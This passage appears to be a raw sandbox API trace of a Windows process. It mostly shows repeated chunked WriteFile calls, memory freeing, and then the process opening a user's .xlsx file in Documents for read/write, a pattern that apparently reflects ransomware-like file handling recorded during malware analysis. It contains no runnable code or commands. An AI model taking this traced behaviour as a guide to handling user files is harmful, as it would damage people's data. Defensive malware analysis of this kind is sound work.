lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.973] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.974] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.974] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.989] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.989] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0067.990] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.027] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.028] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.028] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.029] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.029] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.030] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.031] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.031] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.032] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.032] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.033] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.034] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.034] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.034] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.048] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.049] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.049] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.050] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.051] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.051] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.051] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.052] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.053] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.053] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.053] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.054] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.054] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.055] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.056] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.056] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.056] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.560] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.561] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.561] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.562] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.563] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.564] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.564] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.565] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.566] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.566] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.567] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.567] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.568] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.569] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.570] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.570] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.570] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.584] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.585] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.585] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.586] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.587] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.587] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.588] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.588] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.589] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.590] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.590] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.291] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.325] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.326] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.327] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.327] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.328] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.340] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.341] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.341] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.341] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.342] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.342] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.343] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.343] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.344] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.344] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.345] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.345] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.346] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.346] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.347] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.347] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.348] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0069.348] VirtualQuery (in: lpAddress=0x7da10000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7da10000, AllocationBase=0x7da10000, AllocationProtect=0x4, RegionSize=0x530000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.349] VirtualFree (lpAddress=0x7da10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.350] VirtualQuery (in: lpAddress=0x7df40000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7df40000, AllocationBase=0x7df40000, AllocationProtect=0x4, RegionSize=0x150000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.350] VirtualFree (lpAddress=0x7df40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.351] VirtualQuery (in: lpAddress=0x7e090000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7e090000, AllocationBase=0x7e090000, AllocationProtect=0x4, RegionSize=0x1a0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.351] VirtualFree (lpAddress=0x7e090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.352] CloseHandle (hObject=0x1d4) returned 1 [0072.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\g761Ga.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\g761ga.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0072.373] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.373] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x14d9c [0072.373] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.373] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.373] ReleaseMutex (hMutex=0x168) returned 1 [0072.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g761Ga.xlsx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 